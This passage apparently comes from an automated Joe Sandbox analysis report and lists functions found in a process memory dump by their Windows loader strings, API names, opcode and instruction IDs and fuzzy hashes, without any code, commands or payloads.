                                                • API ID:
                                                • String ID: .Local\$@
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 36DD2A95
                                                • RtlpInitializeAssemblyStorageMap, xrefs: 36DD2A90
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: @[6@[6
                                                APIs
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 36E33356
                                                Similarity
                                                • API ID: CallFilterFunc@8
                                                • String ID:
                                                APIs
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                APIs
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                APIs
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                APIs
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                APIs
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                Strings
                                                • System Volume Information, xrefs: 36E0DEBE
                                                Similarity
                                                • API ID:
                                                • String ID: System Volume Information
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                Strings
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PreferredUILanguages
                                                • API String ID: 0-1884656846
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: verifier.dll
                                                • API String ID: 0-3265496382
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                Strings
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36D60058
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                • API String ID: 0-996340685
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: g6
                                                • API String ID: 0-3127300404
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Actx
                                                • API String ID: 0-89312691
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrCreateEnclave
                                                • API String ID: 0-3262589265
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5cb3e866508f235e78bdf3edaedeb29f83a046f65ea2e160b6a30505e3d881c5
                                                • Instruction ID: cdabf8e320fa6413e176cefff2684f605e19e88c059bac5dbe77a6ef4c40e730
                                                • Opcode Fuzzy Hash: 5cb3e866508f235e78bdf3edaedeb29f83a046f65ea2e160b6a30505e3d881c5
                                                • Instruction Fuzzy Hash: 74819275A00205DFDB09CF59C480AAEBBF2FF48304F1581A9D859EB355D734EA55CB90
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 96d4d61bcc0cdb2fcebdc5ef8f78ed0dd9f057ba192143f132642e5b80391944
                                                • Instruction ID: 664b504a91e5a7a59379028948802237d32fbeaa171acbe60d54f93073196134
                                                • Opcode Fuzzy Hash: 96d4d61bcc0cdb2fcebdc5ef8f78ed0dd9f057ba192143f132642e5b80391944
                                                • Instruction Fuzzy Hash: 2A61C1B6600715AFE711DF66CC80B9BBBAAFF88754F004619F85887240DB30E519CBE2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff522c3c6537f74a4ff8473441b1bc929e4bb8ed9fde433880c25c943efde4a3
                                                • Instruction ID: 07c9d38ce406e11eae2fc45dc1224baf7ac12872c473b20c82f1fdf38952d4c7
                                                • Opcode Fuzzy Hash: ff522c3c6537f74a4ff8473441b1bc929e4bb8ed9fde433880c25c943efde4a3
                                                • Instruction Fuzzy Hash: 696137B5A047418FE301DF67C894B5AB7E6FF80708F14146CE8998B281DB75E80ECB92
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 248b831376cd01c82290b12a31b9924629d59235b8743163bf98b6567b3c4b52
                                                • Instruction ID: 212321df67affd7d3cb20bda2c24776a186a3f482e44d52aa3b9d30b5c469fee
                                                • Opcode Fuzzy Hash: 248b831376cd01c82290b12a31b9924629d59235b8743163bf98b6567b3c4b52
                                                • Instruction Fuzzy Hash: 60519A72608302DFD704DF2AD940A5AB7E6EF98358F55892DF499D7240E730E819CFA2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 560d1a90ac210632884dd5a0a744483c9fa966326aad27594260bc11b19a8f02
                                                • Instruction ID: deecacdb6ecccbca88076f38d3561801851870d8f0d941806b5de5fa7f767ada
                                                • Opcode Fuzzy Hash: 560d1a90ac210632884dd5a0a744483c9fa966326aad27594260bc11b19a8f02
                                                • Instruction Fuzzy Hash: D0510DB9A0027596DB04CF55CC91ABAB3B5BF42F88B50405DE855CB100E739CD4ED7A1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                • Instruction ID: 40d71e7a0bea15d40925006c94de9b36fd4d53c0a4c58e8947c8aa35458b148a
                                                • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                • Instruction Fuzzy Hash: 7651D2BAA00316EBDF00AF65CC40A6B77F6EF84684F500469F945C7254EB34C856C7E2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 060b1d01416e16d26f59a5a4ac004ef8d749aba45cfb8de2c13e3e2d76c27036
                                                • Instruction ID: 437a183d2b9f8d6ab78b087b7486e41b31e4885b8a167975fbbd6dc9d9c2a767
                                                • Opcode Fuzzy Hash: 060b1d01416e16d26f59a5a4ac004ef8d749aba45cfb8de2c13e3e2d76c27036
                                                • Instruction Fuzzy Hash: 9651B2B15053409FE320EF66CD84F5A77A9EF84764F10062DEA6197291DB30D849C7B6
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 441bdb406c6ad7959fb4c86f151d1e555f95c720e80acc6e29ba5c6da69c182c
                                                • Instruction ID: bc7d7dc6ddcff52a98714b413f03b49e601715f3886086705b0591dd350b13b8
                                                • Opcode Fuzzy Hash: 441bdb406c6ad7959fb4c86f151d1e555f95c720e80acc6e29ba5c6da69c182c
                                                • Instruction Fuzzy Hash: 70413371A00700DFEB258F25CC90B5AB7B9FF48764F624469E759EB690EB30D841CBA1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3cbfe7688dd0ebec85b7afbe0419aaf54e03f1adbb227cd018f4e8161d490af8
                                                • Instruction ID: 67d37381cb419722ebd8402091766e5fa1e6b3b780d9238c92ed4ec9653556a7
                                                • Opcode Fuzzy Hash: 3cbfe7688dd0ebec85b7afbe0419aaf54e03f1adbb227cd018f4e8161d490af8
                                                • Instruction Fuzzy Hash: E1518770900308AFEB218FAACD81BDDBBB9EF05344F60012AE595AB195DB719854DFA1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f08b7c1be3734abca9153c147b824ce72c3865f1dd56aa91549571e16240ff7
                                                • Instruction ID: 820ca812b4da797eae3924bb351e5e166675b2d8a029113982b882e2f9843d81
                                                • Opcode Fuzzy Hash: 7f08b7c1be3734abca9153c147b824ce72c3865f1dd56aa91549571e16240ff7
                                                • Instruction Fuzzy Hash: 84510379E10666EFD301CF68C880A59B7B1FF04714F124269E884DBB40EB34E995CBD2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                • Instruction ID: 2b3cdc9f650176373c521f2bec4220a28e2e46d373c447882ecb47085b668a7f
                                                • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                                • Instruction Fuzzy Hash: 08517E766083459FD300DF69C880B5AB7EAFFC8348F04892DF99487240D774E90ACB92
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 951ca0329e124e58f448055ec1d63ced91b85683a9540cb9c76d44d8084766e5
                                                • Instruction ID: c3c87a99dd685222a4f6ded3ee013e16ef5deeb12b2aef86620fab7e5e53e4be
                                                • Opcode Fuzzy Hash: 951ca0329e124e58f448055ec1d63ced91b85683a9540cb9c76d44d8084766e5
                                                • Instruction Fuzzy Hash: 56515A75E11319DBEB11CBAACC40BDDB7B4AB08B5CFA00019D941E7250DBB5D984CBA2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ca54ede07b53f240dbfabbb55330a97914c2b016457185163db3be0474ff5a0
                                                • Instruction ID: ba07ab7038b2d47e81a7d14cfa56bc70f2af89275d4376488fd3087c76103acb
                                                • Opcode Fuzzy Hash: 4ca54ede07b53f240dbfabbb55330a97914c2b016457185163db3be0474ff5a0
                                                • Instruction Fuzzy Hash: 4751CAB2A24351DFE721CF15C880A5AB7E4EF88358F038529F9949FA50D736E944CBD2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4b924d2219d7ec1ef957ae7927aee95677ce3a37f4047441ed5f92e96816e653
                                                • Instruction ID: 949d1795227143e4d1be144b82d915a70537d221da9704fe962af6aafc3e9228
                                                • Opcode Fuzzy Hash: 4b924d2219d7ec1ef957ae7927aee95677ce3a37f4047441ed5f92e96816e653
                                                • Instruction Fuzzy Hash: 9151C175E01315CFDB14CFAAC490A8EFBF1BF58358F608519D554A7340DB31A944CBA1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fff4531dce1762ad6587213e2e32404feb9591cbc024f3e780eff885d596b915
                                                • Instruction ID: 73455592053fb53bdbe34d2d78eb403e31615d5e9e8e01a67be3c5c649bde3f5
                                                • Opcode Fuzzy Hash: fff4531dce1762ad6587213e2e32404feb9591cbc024f3e780eff885d596b915
                                                • Instruction Fuzzy Hash: 284188B6D0432EAFD7119BA58C40AEFB7BDAF44654F510166E900FB600DA34DD05C7E2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                • Instruction ID: a993a93167816f30a4f52d26b0544411e891deb06ba28698fd2eb89ee658063b
                                                • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                • Instruction Fuzzy Hash: 0D518075601646DFDB05CF14C980E46BBF5FF45308F2981AAE808DF262E771E989CB90
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 997d003c35cdc852fb06a00c8f0571de05495570d76aad271e290b3218809e97
                                                • Instruction ID: 9c22efb9968776b513f83d2ca79f9cf620d29a4cbfaf013a7ca5ea0c937158af
                                                • Opcode Fuzzy Hash: 997d003c35cdc852fb06a00c8f0571de05495570d76aad271e290b3218809e97
                                                • Instruction Fuzzy Hash: 1351D175A04795CFE311CF1AD880B6A73F5EB45798F8608A5F8449BB94DB34DC40CBA2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                • Instruction ID: ce27f927bd6287445970d514e7c6e46f085764b9a4122e0c4efe0c22d47fa8c4
                                                • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                                • Instruction Fuzzy Hash: E25107B5E00205DFDF18CFA9C481A99BBF1FF48314B60856ED81997349D734EA80CB90
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 53b6c62dc633abfe36336a2ba0dfc22fbce903a40512454e6504f4e83b4e5729
                                                • Instruction ID: 119d0a7e8285fdfe82478d120104ab3dfdc758496dad3a9737e2fed9bfab8aec
                                                • Opcode Fuzzy Hash: 53b6c62dc633abfe36336a2ba0dfc22fbce903a40512454e6504f4e83b4e5729
                                                • Instruction Fuzzy Hash: 9841ECB1A40701EFEB219F65CC91B4ABBF8FF01794F114429E651DBAA0DB70D800CBA2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a8ae4fb70541d566c401b50141b0ea1452954d82a5fc82e9e0619d88cf5e0c30
                                                • Instruction ID: cab48a6f7a59f43e12fee4b32a833ddc34b966e736094abfaf9e60524668c990
                                                • Opcode Fuzzy Hash: a8ae4fb70541d566c401b50141b0ea1452954d82a5fc82e9e0619d88cf5e0c30
                                                • Instruction Fuzzy Hash: 61411576505344DFD324EF66CD94E6AB7A9EF84360F00052DEA559B294CB30E81ACBF2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d3ecdc75845e4efcf9a5524340a0558ffaffa1f42db526757369321156727b28
                                                • Instruction ID: 338ac3aad03b23aef49eaec6a970c203508a22192c74ddfad2bc48795e4178e0
                                                • Opcode Fuzzy Hash: d3ecdc75845e4efcf9a5524340a0558ffaffa1f42db526757369321156727b28
                                                • Instruction Fuzzy Hash: 0F316875B10660AFE312AB65CC40F6BBBBBEF41B88F144150F8448B741EA75DC84C7A1
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                 • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e9313162482f94b453a1aede7ab3ba2b85a6d18c0817668322cfa4dfaaa20178
                                                • Instruction ID: 56511785f88dd7da0bb5a8352efa38a48bfffb9b18fd08ac1c745a4ab6ccfa26
                                                • Opcode Fuzzy Hash: e9313162482f94b453a1aede7ab3ba2b85a6d18c0817668322cfa4dfaaa20178
                                                • Instruction Fuzzy Hash: B14162B5A01704ABDB21CF66CD54E97B7ECEF40754F10491EA4A6D3690D730E604DF64
                                                Memory Dump Source
